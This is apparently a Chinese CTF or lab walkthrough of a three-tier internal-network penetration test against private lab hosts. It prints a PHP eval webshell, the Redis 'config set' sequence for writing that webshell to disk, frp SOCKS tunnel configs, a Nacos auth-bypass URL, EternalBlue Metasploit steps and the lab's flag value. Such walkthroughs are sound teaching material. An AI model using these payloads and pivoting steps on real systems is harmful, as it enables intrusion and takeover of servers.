三层渗透测试-DMZ区域 & 二三层设备区域
字数 1962 2025-08-22 12:23:30

三层网络渗透测试实战教学文档

1. DMZ区域渗透测试

1.1 信息收集阶段

网络扫描

  • 使用ifconfig确认攻击机与DMZ靶机连接的网段:192.168.50.0/24
  • 使用nmap扫描发现目标:nmap -sS 192.168.50.0/24
  • 发现192.168.50.128开放8080端口,确认为目标CMS平台

目录扫描

  • 使用dirsearch工具扫描网站目录:python3 dirsearch.py -u http://192.168.50.128:8080 -e *
  • 发现关键文件:
    • 管理后台地址:/dede/login.php
    • SQL相关文件:/data/sql.txt

FTP信息获取

  • 从sql.txt中发现FTP凭证:
    • 用户名:ftpuser
    • 密码:ftppass@123
  • 连接FTP获取网站源码:ftp 192.168.50.128get dedecms.zip

1.2 源码审计与漏洞利用

后台登录分析

  • 分析/dede/login.php登录逻辑
  • 发现验证码机制,使用captcha-killer-modified插件绕过:
    • GitHub地址:https://github.com/f0ng/captcha-killer-modified
    • 配置教程参考:https://blog.csdn.net/weixin_72986003/article/details/144359468
  • 爆破成功获取管理员凭证:
    • 用户名:admin
    • 密码:admin123

文件上传漏洞利用

  1. 登录后台后,发现"附件管理"功能
  2. 修改系统参数,添加允许上传的文件类型(如.php)
  3. 直接上传Webshell:
    <?php @eval($_POST['cmd']);?>
    
  4. 使用蚁剑连接:http://192.168.50.128:8080/uploads/shell.php

获取flag

  • 在administrator桌面找到flag文件
  • flag值:flag{78477a738c06620b872421af357d2cd5}

2. 二层设备区域渗透

2.1 内网信息收集

网络拓扑发现

  • 在已控制的DMZ主机上执行:ipconfig /all
  • 发现第二网卡信息:192.168.60.0/24

内网扫描

  • 上传fscan工具到DMZ主机
  • 执行扫描:fscan -h 192.168.60.0/24
  • 发现关键服务:
    • 192.168.60.129:8848 - Nacos服务
    • 192.168.60.129:6379 - Redis服务

2.2 内网代理建立

使用frp建立隧道

  1. 攻击机配置frps.ini:
    [common]
    bind_port = 7000
    
  2. 启动服务端:./frps -c frps.ini
  3. DMZ主机配置frpc.ini:
    [common]
    server_addr = 192.168.50.1
    server_port = 7000
    
    [socks5]
    type = tcp
    remote_port = 1080
    plugin = socks5
    
  4. 启动客户端:./frpc -c frpc.ini

配置代理工具

  • 修改/etc/proxychains4.conf:
    socks5 192.168.50.1 1080
    

2.3 漏洞利用

Nacos认证绕过

  1. 访问漏洞URL:
    http://192.168.60.129:8848/nacos/v1/auth/users?username=test&password=test
    
  2. 使用POST方法创建管理员账户
  3. 登录获取第一个flag

Redis未授权访问

  1. 使用获取的密码连接Redis:
    redis-cli -h 192.168.60.129 -a redispass
  2. 写入Webshell:
    config set dir /var/www/html
    config set dbfilename shell.php
    set x "<?php @eval($_POST['cmd']);?>"
    save
    
  3. 使用蚁剑连接获取根目录flag

3. 三层设备区域渗透

3.1 信息收集

上传扫描工具

  • 将fscan上传至二层设备
  • 执行扫描:./fscan -h 192.168.70.0/24
  • 发现MS17-010漏洞(永恒之蓝)

3.2 漏洞利用

使用MSF进行攻击

  1. 启动msfconsole
  2. 搜索漏洞模块:
    search ms17_010
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS 192.168.70.130
    exploit
    
  3. 注入payload获取meterpreter会话

获取权限

  • 漏洞利用会自动创建用户:
    • 用户名:hacker
    • 密码:P@ssw0rd
  • 使用psexec.py连接:
    python3 psexec.py hacker:'P@ssw0rd'@192.168.70.130

获取flag

  • 在pro用户桌面找到flag文件

4. 关键工具与资源

  1. 信息收集工具

    • nmap
    • dirsearch
    • fscan (内网综合扫描工具)
  2. 漏洞利用工具

    • captcha-killer-modified (验证码绕过)
    • frp (内网穿透)
    • Metasploit Framework
  3. Webshell管理

    • 蚁剑(AntSword)
    • 冰蝎(Behinder)
  4. 参考资源

    • Nacos认证绕过分析:https://blog.csdn.net/weixin_51345872/article/details/127066347
    • 验证码爆破教程:https://blog.csdn.net/weixin_72986003/article/details/144359468

5. 渗透测试流程图

开始
│
├─ DMZ区域渗透
│   ├─ 信息收集(nmap, dirsearch)
│   ├─ FTP凭证获取
│   ├─ 后台爆破(captcha-killer)
│   ├─ 文件上传漏洞利用
│   └─ 获取flag
│
├─ 二层区域渗透
│   ├─ 内网扫描(fscan)
│   ├─ 建立隧道(frp)
│   ├─ Nacos漏洞利用
│   ├─ Redis漏洞利用
│   └─ 获取flag
│
└─ 三层区域渗透
    ├─ 扫描发现MS17-010
    ├─ 永恒之蓝漏洞利用
    └─ 获取flag
结束
三层网络渗透测试实战教学文档 1. DMZ区域渗透测试 1.1 信息收集阶段 网络扫描 使用 ifconfig 确认攻击机与DMZ靶机连接的网段:192.168.50.0/24 使用nmap扫描发现目标: nmap -sS 192.168.50.0/24 发现192.168.50.128开放8080端口,确认为目标CMS平台 目录扫描 使用dirsearch工具扫描网站目录: python3 dirsearch.py -u http://192.168.50.128:8080 -e * 发现关键文件: 管理后台地址:/dede/login.php SQL相关文件:/data/sql.txt FTP信息获取 从sql.txt中发现FTP凭证: 用户名:ftpuser 密码:ftppass@123 连接FTP获取网站源码: ftp 192.168.50.128 → get dedecms.zip 1.2 源码审计与漏洞利用 后台登录分析 分析/dede/login.php登录逻辑 发现验证码机制,使用captcha-killer-modified插件绕过: GitHub地址:https://github.com/f0ng/captcha-killer-modified 配置教程参考:https://blog.csdn.net/weixin_ 72986003/article/details/144359468 爆破成功获取管理员凭证: 用户名:admin 密码:admin123 文件上传漏洞利用 登录后台后,发现"附件管理"功能 修改系统参数,添加允许上传的文件类型(如.php) 直接上传Webshell: 使用蚁剑连接:http://192.168.50.128:8080/uploads/shell.php 获取flag 在administrator桌面找到flag文件 flag值: flag{78477a738c06620b872421af357d2cd5} 2. 二层设备区域渗透 2.1 内网信息收集 网络拓扑发现 在已控制的DMZ主机上执行: ipconfig /all 发现第二网卡信息:192.168.60.0/24 内网扫描 上传fscan工具到DMZ主机 执行扫描: fscan -h 192.168.60.0/24 发现关键服务: 192.168.60.129:8848 - Nacos服务 192.168.60.129:6379 - Redis服务 2.2 内网代理建立 使用frp建立隧道 攻击机配置frps.ini: 启动服务端: ./frps -c frps.ini DMZ主机配置frpc.ini: 启动客户端: ./frpc -c frpc.ini 配置代理工具 修改/etc/proxychains4.conf: 2.3 漏洞利用 Nacos认证绕过 访问漏洞URL: 使用POST方法创建管理员账户 登录获取第一个flag Redis未授权访问 使用获取的密码连接Redis: redis-cli -h 192.168.60.129 -a redispass 写入Webshell: 使用蚁剑连接获取根目录flag 3. 三层设备区域渗透 3.1 信息收集 上传扫描工具 将fscan上传至二层设备 执行扫描: ./fscan -h 192.168.70.0/24 发现MS17-010漏洞(永恒之蓝) 3.2 漏洞利用 使用MSF进行攻击 启动msfconsole 搜索漏洞模块: 注入payload获取meterpreter会话 获取权限 漏洞利用会自动创建用户: 用户名:hacker 密码:P@ssw0rd 使用psexec.py连接: python3 psexec.py hacker:'P@ssw0rd'@192.168.70.130 获取flag 在pro用户桌面找到flag文件 4. 关键工具与资源 信息收集工具 : nmap dirsearch fscan (内网综合扫描工具) 漏洞利用工具 : captcha-killer-modified (验证码绕过) frp (内网穿透) Metasploit Framework Webshell管理 : 蚁剑(AntSword) 冰蝎(Behinder) 参考资源 : Nacos认证绕过分析:https://blog.csdn.net/weixin_ 51345872/article/details/127066347 验证码爆破教程:https://blog.csdn.net/weixin_ 72986003/article/details/144359468 5. 渗透测试流程图